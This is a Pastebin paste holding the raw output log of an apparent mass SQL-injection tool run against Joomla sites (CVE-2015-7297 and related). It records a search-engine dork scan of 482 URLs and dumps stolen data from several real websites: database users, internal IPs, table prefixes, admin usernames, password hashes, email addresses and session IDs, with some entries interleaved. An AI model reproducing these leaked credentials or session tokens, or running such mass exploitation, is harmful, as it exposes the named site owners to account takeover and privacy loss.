Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- [Mass Exploit] Joomla 3.2 - 3.44 SQL Injection
- Vulnerability found by : trustwave.com
- CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858
- MakMan -- http://mukarramkhalid.com -- http://fb.com/makmaniac
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- [+] Starting dork scanner for : inurl:index.php?option=com_*
- [+] Total URLs found : 482
- [+] URLs written to urls.txt
- [+] Trying Joomla SQL Injection exploit on 482 urls
- ------------------------------------------------
- [+] Url : http://birchcc.org/index.php/component/k2/itemlist/user/258875
- [+] User : cl12-birchnew@10.0.1.46
- [+] Version : 5.5.35
- [+] tbl_prefix : b15ow_
- [+] Username : angus
- [+] Password : $2y$10$lUgVrwpNBDMYexBmSzZ9t.0JCORpWjsf8/bi2uIvE5a3qnyRHYqqe
- [+] Email : angus@gapcsupport.co.uk
- [+] Session Id : j50v8h9gdfieskmn896u363fp4
- ------------------------------------------------
- ------------------------------------------------
- [+] Url : http://www.ftc.sc/index.php/component/k2/itemlist/user/9112
- [+] User : ftc_dtadm@localhost
- [+] Version : 5.1.73-cll
- [+] tbl_prefix : ftqno_
- [+] Username : admin
- [+] Password : $2y$10$7b6RxmKp3EXDHZCA0S7.N.kg6eWwgx4ydFFHXOahQug/6rHIRXPka
- [+] Email : eltonpiko@yahoo.co.uk
- [+] Session Id : 97b976049d12646bc42b4215ee84121f
- ------------------------------------------------
- ------------------------------------------------
- [+] Url : http://flowcode.info/index.php
- [+] User : braun_jom3@localhost
- [+] Version : 5.1.68-cll-lve
- [+] tbl_prefix : jom3_
- [+] Username : admin
- [+] Password : $2y$10$9MyXxyjrZpFRoanRnW7L4OrXi3PKJAXkGcw.1k5vjQmLwHxmGWTlK
- [+] Email : info@flowcode.info
- [+] Session Id : pt90r8fnt3fj9o1uf82mi6io37
- ------------------------------------------------
- ------------------------------------------------
- [+] Url : http://www.oxintstudycentre.com/index.php
- [+] User : oiscwww@localhost
- [+] Version : 5.5.44-0ubuntu0.14.04.1
- [+] tbl_prefix : eth_
- [+] Username : shawnv15
- [+] Password : 6abcf8393eddd4135b6923e36471a6fd:Da9Ufe1Mtt43M1uBBfbraG9e04qkY3
- ZI
- [+] Email : shawn@joomlawebwise.comv15
- [+] Session Id : 3eag12cu5ui0cvhqt8frth8a75
- ------------------------------------------------
- ------------------------------------------------
- [+] Url : http://in-jir.com/index.php/component/k2/itemlist/user/37495
- [+] User : injir_user@localhost
- [+] Version : 5.5.45-37.4
- [+] tbl_prefix : ml8yx_
- [+] Username : adminjir
- [+] Password : $P$Dod47J7kpCIms94IpSTtrnU5IGPtc3.
- [+] Email : info@in-jir.com
- [+] Session Id : sbkqbnblm3oepp3lies6pn6bs6
- ------------------------------------------------
- ------------------------------------------------
- ------------------------------------------------
- ------------------------------------------------
- [+] Url : https://www.tahoerimtrail.org/index.php/support-the-trail
- [+] User : tahoerim_tahlive@localhost
- [+] Url : http://www.upaep.mx/index.php
- [+] Url : http://galsltd.ru/index.php/component/k2/itemlist/user/14669
- [+] Version : 5.5.42-37.1-log
- [+] User : pisql@localhost
- [+] tbl_prefix : jml_
- [+] Username :
- [+] Password :
- [+] Email :
- [+] Session Id :
- ------------------------------------------------
- [+] User : gb_gls_new@81.177.49.5
- [+] Version : 5.5.33-cll-lve
- [+] Version : 5.5.35-rel33.0-log
- [+] tbl_prefix : upaep_
- [+] tbl_prefix : o9t48_
- [+] Username : pi.upaep.joomla
- [+] Username : admin
- [+] Password : f57aefaa05e9af79815e82db53d82762:385e2Db5G6ut6Q5OpUntNAxmhKZLnE
- uc
- [+] Password : $2y$10$XykUK4B22nEm7bRcOYnkLONTThQ77b3N2aRJ8z4JQK4Xou/3Gk2X.
- [+] Email : web@upaep.mx
- [+] Email : imv@svetcom.ru
- [+] Session Id : cn4vmdi5i7lu8e80oob9hetsu6
- [+] Session Id : 47e5a03r6f99afku70rfljmat4
- ------------------------------------------------
- ------------------------------------------------
- Total URLs Scanned : 482
- Vulnerable URLs Found : 8
- Script Execution Time : 156.95878314971924 seconds
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement